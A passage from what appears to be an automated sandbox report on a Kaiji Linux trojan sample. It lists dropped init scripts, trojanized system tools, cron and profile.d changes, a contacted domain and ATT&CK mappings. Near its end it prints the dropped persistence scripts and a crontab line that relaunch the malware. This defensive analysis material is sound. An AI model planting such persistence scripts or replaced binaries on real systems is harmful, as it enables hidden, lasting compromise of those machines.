Source: /usr/sbin/service (PID: 5855)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5881)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/32676 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /boot/System.mod (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/lib/libgdi.so.0.8.1 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/lib/system-mark (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/include/ps (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/include/ss (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/include/ls (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/include/dir (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/include/netstat (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/include/find (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/include/lsof (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/ps (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/ss (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/ls (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/dir (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/netstat (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/find (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /usr/bin/lsof (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/32676	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /.mod	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apport	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cron	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/procps	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/saned	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/udev	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-common	Jump to dropped file

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Shell script file created: /etc/profile.d/bash_cfg.sh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Shell script file created: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Shell script file created: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Shell script file created: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Shell script file created: /etc/profile.d/gateway.sh	Jump to dropped file

Source: /usr/sbin/service (PID: 5774)	Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p			Jump to behavior
Source: /usr/sbin/service (PID: 5856)	Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/apport	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/cron	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/cups	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/procps	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/saned	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/udev	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	File: /etc/init.d/x11-common	Jump to dropped file

Source: /etc/32676 (PID: 5768)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior
Source: /etc/32676 (PID: 5973)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior
Source: /etc/32676 (PID: 6054)	Sleep executable: /usr/bin/sleep -> sleep 60	Jump to behavior

Source: /usr/bin/sleep (PID: 5768)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/bin/sleep (PID: 5973)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/bin/sleep (PID: 6054)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5871)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5948)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 6029)	Sleeps longer then 60s: 60.0s	Jump to behavior

Source: /tmp/fL4E1jNVCt.elf (PID: 5756)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5765)	Queries kernel information via 'uname':	Jump to behavior
Source: /etc/32676 (PID: 5766)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5777)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5822)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5826)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5926)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 6001)	Queries kernel information via 'uname':	Jump to behavior

Source: open-vm-tools.14.dr	Binary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1
Source: open-vm-tools.14.dr	Binary or memory string: if ! ${checktool} \| grep -iq vmware; then
Source: open-vm-tools.14.dr	Binary or memory string: rm -f /var/run/vmtoolsd.pid
Source: open-vm-tools.14.dr	Binary or memory string: checktool='vmware-checkvm'
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid \|\| exit 2
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 \|\| exit $?

Stealing of Sensitive Information

Yara detected Kaiji

Source: Yara match

File source: fL4E1jNVCt.elf, type: SAMPLE

Remote Access Functionality

Yara detected Kaiji

Source: Yara match

File source: fL4E1jNVCt.elf, type: SAMPLE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hide Artifacts	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fL4E1jNVCt.elf	21%	ReversingLabs	Linux.Trojan.Ares
fL4E1jNVCt.elf	30%	Virustotal		Browse
fL4E1jNVCt.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
/.mod	0%	ReversingLabs
/etc/32676	0%	ReversingLabs
/etc/init.d/acpid	0%	ReversingLabs
/etc/init.d/alsa-utils	0%	ReversingLabs
/etc/init.d/anacron	0%	ReversingLabs
/etc/init.d/apparmor	0%	ReversingLabs
/etc/init.d/avahi-daemon	0%	ReversingLabs
/etc/init.d/binfmt-support	0%	ReversingLabs
/etc/init.d/bluetooth	0%	ReversingLabs
/etc/init.d/console-setup.sh	0%	ReversingLabs
/etc/init.d/cron	0%	ReversingLabs
/etc/init.d/cryptdisks	0%	ReversingLabs
/etc/init.d/cryptdisks-early	0%	ReversingLabs
/etc/init.d/cups	0%	ReversingLabs
/etc/init.d/cups-browsed	0%	ReversingLabs
/etc/init.d/dbus	0%	ReversingLabs
/etc/init.d/gdm3	0%	ReversingLabs
/etc/init.d/hddtemp	0%	ReversingLabs
/etc/init.d/hwclock.sh	0%	ReversingLabs
/etc/init.d/irqbalance	0%	ReversingLabs
/etc/init.d/iscsid	0%	ReversingLabs
/etc/init.d/keyboard-setup.sh	0%	ReversingLabs
/etc/init.d/kmod	0%	ReversingLabs
/etc/init.d/lightdm	0%	ReversingLabs
/etc/init.d/lm-sensors	0%	ReversingLabs
/etc/init.d/lvm2-lvmpolld	0%	ReversingLabs
/etc/init.d/mono-xsp4	0%	ReversingLabs
/etc/init.d/multipath-tools	0%	ReversingLabs
/etc/init.d/open-iscsi	0%	ReversingLabs
/etc/init.d/open-vm-tools	0%	ReversingLabs
/etc/init.d/plymouth	0%	ReversingLabs
/etc/init.d/plymouth-log	0%	ReversingLabs
/etc/init.d/procps	0%	ReversingLabs
/etc/init.d/rsync	0%	ReversingLabs
/etc/init.d/rsyslog	0%	ReversingLabs
/etc/init.d/saned	0%	ReversingLabs
/etc/init.d/screen-cleanup	0%	ReversingLabs
/etc/init.d/spice-vdagent	0%	ReversingLabs
/etc/init.d/ssh	0%	ReversingLabs
/etc/init.d/udev	0%	ReversingLabs
/etc/init.d/ufw	0%	ReversingLabs
/etc/init.d/unattended-upgrades	0%	ReversingLabs
/etc/init.d/uuidd	0%	ReversingLabs
/etc/init.d/x11-common	0%	ReversingLabs
/etc/profile.d/bash_cfg.sh	0%	ReversingLabs

Domains

Source	Detection	Scanner	Label	Link
www.google.com	0%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.251.116.105	true	false	0%, Virustotal, Browse	unknown
ss.us-tv.top	unknown	unknown	false		unknown

World Map of Contacted IPs

⊘No contacted IP infos

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.google.com	Ww0lpzmYHO.elf	Get hash	malicious	Kaiji	Browse	142.251.116.105
	c4RvDuLtq1.elf	Get hash	malicious	Kaiji	Browse	216.58.212.132
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	142.250.186.36
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.186.100
	http://168.63.129.16:32526/vmSettings	Get hash	malicious	Unknown	Browse	142.250.185.228
	https://dareka4te.shop	Get hash	malicious	Unknown	Browse	142.250.186.132
	http://www.thexe.afatydfe.com/	Get hash	malicious	Unknown	Browse	142.250.185.132
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	142.250.186.132
	cPds84vxfC.exe	Get hash	malicious	LummaC, AveMaria, LummaC Stealer, UACMe	Browse	142.250.80.100
	https://predictiveanalyticsgroup.formstack.com/forms/i_am_not_a_robot	Get hash	malicious	Unknown	Browse	216.58.206.36

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/.mod	Ww0lpzmYHO.elf	Get hash	malicious	Kaiji	Browse
	c4RvDuLtq1.elf	Get hash	malicious	Kaiji	Browse
	linux_arm5.elf	Get hash	malicious	Kaiji	Browse
	linux_aarch64.elf	Get hash	malicious	Kaiji	Browse
	linux_amd64.elf	Get hash	malicious	Kaiji	Browse
	linux_arm7.elf	Get hash	malicious	Kaiji	Browse
	linux_arm6.elf	Get hash	malicious	Kaiji	Browse
	DerI9qwTwK.elf	Get hash	malicious	Kaiji	Browse
	wqX9qtzKkX.elf	Get hash	malicious	Kaiji	Browse
	QHoi0jjr6w.elf	Get hash	malicious	Kaiji	Browse
/etc/32676	Ww0lpzmYHO.elf	Get hash	malicious	Kaiji	Browse
	c4RvDuLtq1.elf	Get hash	malicious	Kaiji	Browse
	linux_arm5.elf	Get hash	malicious	Kaiji	Browse
	linux_aarch64.elf	Get hash	malicious	Kaiji	Browse
	linux_amd64.elf	Get hash	malicious	Kaiji	Browse
	linux_arm7.elf	Get hash	malicious	Kaiji	Browse
	linux_arm6.elf	Get hash	malicious	Kaiji	Browse
	DerI9qwTwK.elf	Get hash	malicious	Kaiji	Browse
	p2GrGlDHjw.elf	Get hash	malicious	Kaiji	Browse
	mJWouOfZLy.elf	Get hash	malicious	Kaiji	Browse

Created / dropped Files

/.mod

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.9931325576478587
Encrypted:	false
SSDEEP:	3:TKH/LQP5o:8M2
MD5:	FF0DB01AA3465358D28FD34FE8479236
SHA1:	DBE00D4EAD9F9FE3D8B97CBDCA1F2EFD5EF86EEF
SHA-256:	BF659AA5C483CF60E1E7626EEC9FAE7AE182CC611A3F42B2521F8A8C018C7195
SHA-512:	F414CE5B5A10DD25EA22CA123473604445411E056F4310DFE1C09AECE6B16CB5AD8B989070201594025A6DBE319FE87A871E63209E977EE185EF302689F048B2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ww0lpzmYHO.elf, Detection: malicious, Browse Filename: c4RvDuLtq1.elf, Detection: malicious, Browse Filename: linux_arm5.elf, Detection: malicious, Browse Filename: linux_aarch64.elf, Detection: malicious, Browse Filename: linux_amd64.elf, Detection: malicious, Browse Filename: linux_arm7.elf, Detection: malicious, Browse Filename: linux_arm6.elf, Detection: malicious, Browse Filename: DerI9qwTwK.elf, Detection: malicious, Browse Filename: wqX9qtzKkX.elf, Detection: malicious, Browse Filename: QHoi0jjr6w.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/bash./usr/lib/libgdi.so.0.8.1

/etc/.walk

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	147
Entropy (8bit):	3.9122986418403602
Encrypted:	false
SSDEEP:	3:3Rk4WtwyIMBJEvuB4WtwyIMBJEvS2TLQdHjhOdQBHXWcMn:hRt2qtK2MdHjcy3Wxn
MD5:	AAB52F7071B000AC9B8885EC8CB6E1A4
SHA1:	9F6A5F26ADD7459896BF841D17F9C7839F77C9F8
SHA-256:	15C4005A0198A5B11E5E24AB234B5B7FCA45DA0CEFE5E82A67D201DC852599FD
SHA-512:	CF9E9F5BCB3AC2C65F028693A8207D67C3DE1C342C2A7E896FC34D120FAC37CAD4918FA4885CCE314416FC1D1B27E52F5BBA1F3D398BF109D827C555E17D0527
Malicious:	false
Reputation:	low
Preview:	e74ed74ec65f017ed1638a49c1350a23fc5dd814df0a797a.e74ed74ec65f017ed1638a49c1350a23fc5dd814df0a797a.e464ed5cf25f2831d065cf4dc1350d7ee85d8a5fc939277a.

/etc/32676

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.619727741986734
Encrypted:	false
SSDEEP:	3:TKH/zOsUF4K0WJTD0HXD:LsUF4kDYXD
MD5:	6CB66DDA6E7B14F42654921B3EC25226
SHA1:	B39354C512D130E1C52E9163DC12C4D5704A60A7
SHA-256:	45A2B263B893B33C703B7E5F64F04DE776D1DC9578BE65C5047195CD531FEF2A
SHA-512:	91A32A8C6B9490CB31CDB79C2E8697DAF1637C63136658B46037D60ED47D2B6D685F62D526E87960BAF93C6875295CF0C892EDAF65B34CBEB00D9961FEE7938B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ww0lpzmYHO.elf, Detection: malicious, Browse Filename: c4RvDuLtq1.elf, Detection: malicious, Browse Filename: linux_arm5.elf, Detection: malicious, Browse Filename: linux_aarch64.elf, Detection: malicious, Browse Filename: linux_amd64.elf, Detection: malicious, Browse Filename: linux_arm7.elf, Detection: malicious, Browse Filename: linux_arm6.elf, Detection: malicious, Browse Filename: DerI9qwTwK.elf, Detection: malicious, Browse Filename: p2GrGlDHjw.elf, Detection: malicious, Browse Filename: mJWouOfZLy.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/bash.while [ 1 ]; do.sleep 60./etc/opt.services.cfg.done

/etc/crontab

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.000961982762677
Encrypted:	false
SSDEEP:	3:HFdtKeIBFv:l6eIBV
MD5:	6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1:	8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256:	AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512:	76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/1 * * * root /.mod .

/etc/init.d/acpid

Download File

Process:	/tmp/fL4E1jNVCt.elf
